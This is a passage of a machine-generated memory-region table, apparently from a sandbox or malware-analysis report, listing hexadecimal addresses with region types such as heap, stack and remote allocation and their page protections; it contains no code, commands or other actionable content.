trusted library allocation
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
CA7D83E000
|
stack
|
page read and write
|
||
|
3367000
|
heap
|
page read and write
|
||
|
26F316AB000
|
trusted library allocation
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
2EC9000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
356B000
|
heap
|
page read and write
|
||
|
1E38E840000
|
heap
|
page read and write
|
||
|
1E6D329B000
|
heap
|
page read and write
|
||
|
1E38EA10000
|
heap
|
page read and write
|
||
|
880B000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
31BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
600000
|
direct allocation
|
page read and write
|
||
|
26F2DE3B000
|
heap
|
page read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
CA7D57D000
|
stack
|
page read and write
|
||
|
1E38E784000
|
heap
|
page read and write
|
||
|
1E6D5188000
|
heap
|
page read and write
|
||
|
26F303FF000
|
trusted library allocation
|
page read and write
|
||
|
2D6F000
|
stack
|
page read and write
|
||
|
740000
|
direct allocation
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
1E6D5141000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
5D0000
|
direct allocation
|
page read and write
|
||
|
6C57CFE000
|
stack
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
1E6D5058000
|
heap
|
page read and write
|
||
|
779D000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7AE000
|
stack
|
page read and write
|
||
|
610000
|
direct allocation
|
page read and write
|
||
|
8B50000
|
trusted library allocation
|
page read and write
|
||
|
CA7D93B000
|
stack
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
20F4C000
|
direct allocation
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
1E6D5180000
|
heap
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
55EA000
|
remote allocation
|
page execute and read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
31C9000
|
trusted library allocation
|
page read and write
|
||
|
1E6D515D000
|
heap
|
page read and write
|
||
|
8828000
|
heap
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
553D000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
5CD8000
|
trusted library allocation
|
page read and write
|
||
|
26F2FB17000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
30DD000
|
stack
|
page read and write
|
||
|
26F2FE20000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
direct allocation
|
page read and write
|
||
|
FE82FF000
|
unkown
|
page read and write
|
||
|
6C585FB000
|
stack
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
7DF4D57D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
1E6D50A2000
|
heap
|
page read and write
|
||
|
26F2FE5B000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F3FBF9000
|
trusted library allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
20E10000
|
remote allocation
|
page read and write
|
||
|
6C584FE000
|
stack
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
26F2FE13000
|
trusted library allocation
|
page read and write
|
||
|
26F2DE7F000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
26F31AED000
|
trusted library allocation
|
page read and write
|
||
|
CA7E60E000
|
stack
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D3170000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
FE83FF000
|
stack
|
page read and write
|
||
|
1E6D32A7000
|
heap
|
page read and write
|
||
|
1E6D5048000
|
heap
|
page read and write
|
||
|
1CE000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
CA7DB3E000
|
stack
|
page read and write
|
||
|
7435000
|
heap
|
page read and write
|
||
|
673000
|
heap
|
page read and write
|
||
|
55E000
|
stack
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
8790000
|
heap
|
page read and write
|
||
|
20E8F000
|
stack
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
26F4807B000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D50A5000
|
heap
|
page read and write
|
||
|
4D5000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library section
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
210D0000
|
heap
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
26F48026000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
313F000
|
stack
|
page read and write
|
||
|
26F47D40000
|
heap
|
page read and write
|
||
|
1E6D3294000
|
heap
|
page read and write
|
||
|
26F3F8F1000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
211D0000
|
heap
|
page read and write
|
||
|
1E38E790000
|
heap
|
page read and write
|
||
|
31F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D51A2000
|
heap
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
8B10000
|
trusted library allocation
|
page read and write
|
||
|
26F2DFD0000
|
heap
|
page read and write
|
||
|
3311000
|
heap
|
page read and write
|
||
|
1E6D31EB000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
CA7E58E000
|
stack
|
page read and write
|
||
|
1E6D3150000
|
heap
|
page read and write
|
||
|
1E6D5164000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
5590000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
73AD000
|
stack
|
page read and write
|
||
|
1E6D5174000
|
heap
|
page read and write
|
||
|
26F3150C000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
trusted library allocation
|
page read and write
|
||
|
CA7E78B000
|
stack
|
page read and write
|
||
|
26F3F900000
|
trusted library allocation
|
page read and write
|
||
|
1E6D51A5000
|
heap
|
page read and write
|
||
|
1E6D3520000
|
heap
|
page read and write
|
||
|
1E6D5159000
|
heap
|
page read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
7440000
|
heap
|
page read and write
|
||
|
6C582FD000
|
stack
|
page read and write
|
||
|
26F3002F000
|
trusted library allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F2E010000
|
trusted library allocation
|
page read and write
|
||
|
26F30407000
|
trusted library allocation
|
page read and write
|
||
|
26F2FF60000
|
trusted library allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
89CC000
|
stack
|
page read and write
|
||
|
41EA000
|
remote allocation
|
page execute and read and write
|
||
|
40F0000
|
remote allocation
|
page execute and read and write
|
||
|
26F30418000
|
trusted library allocation
|
page read and write
|
||
|
26F314F5000
|
trusted library allocation
|
page read and write
|
||
|
26F31B12000
|
trusted library allocation
|
page read and write
|
||
|
6C580FF000
|
stack
|
page read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
26F47FFA000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
7430000
|
heap
|
page read and write
|
||
|
1E6D3297000
|
heap
|
page read and write
|
||
|
8A0C000
|
stack
|
page read and write
|
||
|
7455000
|
heap
|
page read and write
|
||
|
1E6D3297000
|
heap
|
page read and write
|
||
|
4C60000
|
heap
|
page execute and read and write
|
||
|
31E8000
|
heap
|
page read and write
|
||
|
CA7D5FE000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
26F3FBE9000
|
trusted library allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
1E6D3213000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
32C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
1E6D516F000
|
heap
|
page read and write
|
||
|
CA7D4FF000
|
stack
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
1E6D50A2000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
26F2DE3D000
|
heap
|
page read and write
|
||
|
20F20000
|
stack
|
page read and write
|
||
|
26F318A5000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
4B88000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
31B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
71ED000
|
stack
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F318E2000
|
trusted library allocation
|
page read and write
|
||
|
2118C000
|
stack
|
page read and write
|
||
|
2114C000
|
stack
|
page read and write
|
||
|
26F30426000
|
trusted library allocation
|
page read and write
|
||
|
26F2DE07000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
1E6D515D000
|
heap
|
page read and write
|
||
|
77AA000
|
heap
|
page read and write
|
||
|
1E6D5177000
|
heap
|
page read and write
|
||
|
1E6D51BC000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
3365000
|
heap
|
page read and write
|
||
|
26F318B9000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20DE0000
|
heap
|
page read and write
|
||
|
1E6D5140000
|
heap
|
page read and write
|
||
|
4CD2000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
20F4C000
|
direct allocation
|
page read and write
|
||
|
26F31B00000
|
trusted library allocation
|
page read and write
|
||
|
FE7F4D000
|
stack
|
page read and write
|
||
|
87BA000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D31B0000
|
heap
|
page read and write
|
||
|
8BDC000
|
stack
|
page read and write
|
||
|
1E6D5189000
|
heap
|
page read and write
|
||
|
5F1B000
|
trusted library allocation
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page read and write
|
||
|
1E6D327C000
|
heap
|
page read and write
|
||
|
CA7D837000
|
stack
|
page read and write
|
||
|
1F0000
|
heap
|
page readonly
|
||
|
5518000
|
trusted library allocation
|
page read and write
|
||
|
26F2E050000
|
heap
|
page read and write
|
||
|
26F303AD000
|
trusted library allocation
|
page read and write
|
||
|
26F47ED0000
|
heap
|
page read and write
|
||
|
750000
|
direct allocation
|
page read and write
|
||
|
31DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F2DCC0000
|
heap
|
page read and write
|
||
|
20F58000
|
direct allocation
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F3192E000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
92F0000
|
direct allocation
|
page execute and read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
26F47FB0000
|
heap
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
5B0000
|
direct allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
77D2000
|
heap
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
1E6D31DA000
|
heap
|
page read and write
|
||
|
6C5793A000
|
stack
|
page read and write
|
||
|
1E6D5054000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
1E6D3525000
|
heap
|
page read and write
|
||
|
26F2DFE0000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
6C583FE000
|
stack
|
page read and write
|
||
|
1E6D517D000
|
heap
|
page read and write
|
||
|
1E6D50A2000
|
heap
|
page read and write
|
||
|
4BDC000
|
stack
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
71A0000
|
heap
|
page execute and read and write
|
||
|
D4F000
|
stack
|
page read and write
|
||
|
26F3192A000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page execute and read and write
|
||
|
CA7D1CE000
|
stack
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
70AE000
|
stack
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
CA7D7BF000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F2DEE3000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F3153A000
|
trusted library allocation
|
page read and write
|
||
|
26F2DDC0000
|
heap
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
72ED000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F48000
|
direct allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
26F2DF80000
|
trusted library allocation
|
page read and write
|
||
|
3DD000
|
stack
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
direct allocation
|
page read and write
|
||
|
20F48000
|
direct allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F2DE85000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
CA7D779000
|
stack
|
page read and write
|
||
|
1E6D516D000
|
heap
|
page read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
26F4806C000
|
heap
|
page read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
26F3189C000
|
trusted library allocation
|
page read and write
|
||
|
1E6D5155000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D516D000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
26F2F8D0000
|
heap
|
page execute and read and write
|
||
|
86E1000
|
trusted library allocation
|
page read and write
|
||
|
87A4000
|
heap
|
page read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
1E6D5057000
|
heap
|
page read and write
|
||
|
20F48000
|
direct allocation
|
page read and write
|
||
|
1E6D515D000
|
heap
|
page read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
7700000
|
heap
|
page read and write
|
||
|
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C57DFE000
|
stack
|
page read and write
|
||
|
32A0000
|
heap
|
page readonly
|
||
|
26F48039000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
87D9000
|
heap
|
page read and write
|
||
|
1E6D327C000
|
heap
|
page read and write
|
||
|
C7D000
|
stack
|
page read and write
|
||
|
7907000
|
trusted library allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
26F2FE42000
|
trusted library allocation
|
page read and write
|
||
|
26F48053000
|
heap
|
page read and write
|
||
|
20F48000
|
direct allocation
|
page read and write
|
||
|
20E10000
|
remote allocation
|
page read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
85DE000
|
stack
|
page read and write
|
||
|
26F48033000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
1E6D31F0000
|
heap
|
page read and write
|
||
|
CA7DABE000
|
stack
|
page read and write
|
||
|
6A6000
|
heap
|
page read and write
|
||
|
2C6E000
|
unkown
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D515A000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
1E6D3298000
|
heap
|
page read and write
|
||
|
1E38E7B0000
|
heap
|
page read and write
|
||
|
5C0000
|
direct allocation
|
page read and write
|
||
|
87E5000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
26F3FBDA000
|
trusted library allocation
|
page read and write
|
||
|
26F30F38000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
26F2DFD5000
|
heap
|
page read and write
|
||
|
1E38E770000
|
heap
|
page read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20EEB000
|
stack
|
page read and write
|
||
|
1E38E785000
|
heap
|
page read and write
|
||
|
C3C000
|
stack
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
730000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
771D000
|
heap
|
page read and write
|
||
|
20F54000
|
direct allocation
|
page read and write
|
||
|
26F2DDA0000
|
heap
|
page read and write
|
||
|
CA7E68D000
|
stack
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
1E6D4C00000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
1E6D31ED000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
71A5000
|
heap
|
page execute and read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
1E6D50A7000
|
heap
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
78E000
|
unkown
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
1E6D31E6000
|
heap
|
page read and write
|
||
|
A7EA000
|
direct allocation
|
page execute and read and write
|
||
|
1E6D31B7000
|
heap
|
page read and write
|
||
|
26F47DE9000
|
heap
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
1E6D5060000
|
heap
|
page read and write
|
||
|
26F30003000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
1E6D5142000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
7F540000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F303C8000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
26F31532000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
30F9000
|
heap
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
26F31522000
|
trusted library allocation
|
page read and write
|
||
|
1E6D51A6000
|
heap
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page read and write
|
||
|
1E6D5053000
|
heap
|
page read and write
|
||
|
26F2DE41000
|
heap
|
page read and write
|
||
|
26F2DF60000
|
trusted library allocation
|
page read and write
|
||
|
8B0D000
|
stack
|
page read and write
|
||
|
1E6D5040000
|
heap
|
page read and write
|
||
|
4C20000
|
trusted library allocation
|
page read and write
|
||
|
5634000
|
trusted library allocation
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
7EF000
|
stack
|
page read and write
|
||
|
8685000
|
trusted library allocation
|
page read and write
|
||
|
CA7D67E000
|
stack
|
page read and write
|
||
|
7BAB000
|
stack
|
page read and write
|
||
|
26F30E0B000
|
trusted library allocation
|
page read and write
|
||
|
26F2FE30000
|
trusted library allocation
|
page read and write
|
||
|
5C71000
|
trusted library allocation
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
26F47D4E000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
7458000
|
heap
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
742B000
|
stack
|
page read and write
|
||
|
1E6D329A000
|
heap
|
page read and write
|
||
|
620000
|
direct allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
BFD000
|
stack
|
page read and write
|
||
|
1E6D50A7000
|
heap
|
page read and write
|
||
|
1E6D321F000
|
heap
|
page read and write
|
||
|
26F48230000
|
heap
|
page read and write
|
||
|
1E6D50A7000
|
heap
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
20E10000
|
remote allocation
|
page read and write
|
||
|
51F000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
trusted library allocation
|
page read and write
|
||
|
26F47ED4000
|
heap
|
page read and write
|
||
|
59F000
|
stack
|
page read and write
|
||
|
26F3030A000
|
trusted library allocation
|
page read and write
|
||
|
1E6D50A4000
|
heap
|
page read and write
|
||
|
8537000
|
stack
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
4BEA000
|
remote allocation
|
page execute and read and write
|
||
|
26F2FE28000
|
trusted library allocation
|
page read and write
|
||
|
26F2DF00000
|
heap
|
page read and write
|
||
|
7A90000
|
heap
|
page read and write
|
||
|
20F50000
|
direct allocation
|
page read and write
|
||
|
CA7D47F000
|
stack
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
8A4D000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
1E6D51AC000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
1E6D3294000
|
heap
|
page read and write
|
||
|
26F2FE47000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
26F2DF70000
|
heap
|
page readonly
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F2DE57000
|
heap
|
page read and write
|
||
|
26F47DA2000
|
heap
|
page read and write
|
||
|
26F31AE8000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F2F977000
|
trusted library allocation
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
1E6D3242000
|
heap
|
page read and write
|
||
|
26F2F8A0000
|
heap
|
page execute and read and write
|
||
|
1E6D321F000
|
heap
|
page read and write
|
||
|
1E6D5071000
|
heap
|
page read and write
|
||
|
8550000
|
trusted library allocation
|
page read and write
|
||
|
1E6D505B000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
26F317C4000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
heap
|
page read and write
|
||
|
8B20000
|
trusted library allocation
|
page read and write
|
||
|
770D000
|
heap
|
page read and write
|
||
|
4C71000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
5C99000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F30257000
|
trusted library allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
26F2DDF0000
|
heap
|
page read and write
|
||
|
1E6D329F000
|
heap
|
page read and write
|
||
|
26F2E055000
|
heap
|
page read and write
|
||
|
309D000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
26F47DCA000
|
heap
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
55E2000
|
trusted library allocation
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
762F000
|
stack
|
page read and write
|
||
|
DDF000
|
stack
|
page read and write
|
||
|
3304000
|
heap
|
page read and write
|
||
|
8ACE000
|
stack
|
page read and write
|
||
|
1E6D3140000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
1E6D5177000
|
heap
|
page read and write
|
||
|
1E38E84A000
|
heap
|
page read and write
|
||
|
31F2000
|
trusted library allocation
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
1E6D506C000
|
heap
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F47DA0000
|
heap
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
CA7E70A000
|
stack
|
page read and write
|
||
|
69D000
|
heap
|
page read and write
|
||
|
1E6D5150000
|
heap
|
page read and write
|
||
|
1E6D5041000
|
heap
|
page read and write
|
||
|
5F0000
|
direct allocation
|
page read and write
|
||
|
26F301D7000
|
trusted library allocation
|
page read and write
|
||
|
282E000
|
stack
|
page read and write
|
||
|
6C57FFE000
|
stack
|
page read and write
|
||
|
1E6D5044000
|
heap
|
page read and write
|
||
|
26F2F8E0000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
26F303E7000
|
trusted library allocation
|
page read and write
|
||
|
87C6000
|
heap
|
page read and write
|
||
|
8C00000
|
direct allocation
|
page read and write
|
||
|
1E6D504B000
|
heap
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
2A7C000
|
heap
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
26F318CE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
20F40000
|
direct allocation
|
page read and write
|
||
|
732B000
|
stack
|
page read and write
|
||
|
CA7D0C3000
|
stack
|
page read and write
|
||
|
CA7DA3E000
|
stack
|
page read and write
|
||
|
8A8C000
|
stack
|
page read and write
|
||
|
55B9000
|
trusted library allocation
|
page read and write
|
||
|
1E6D31E0000
|
heap
|
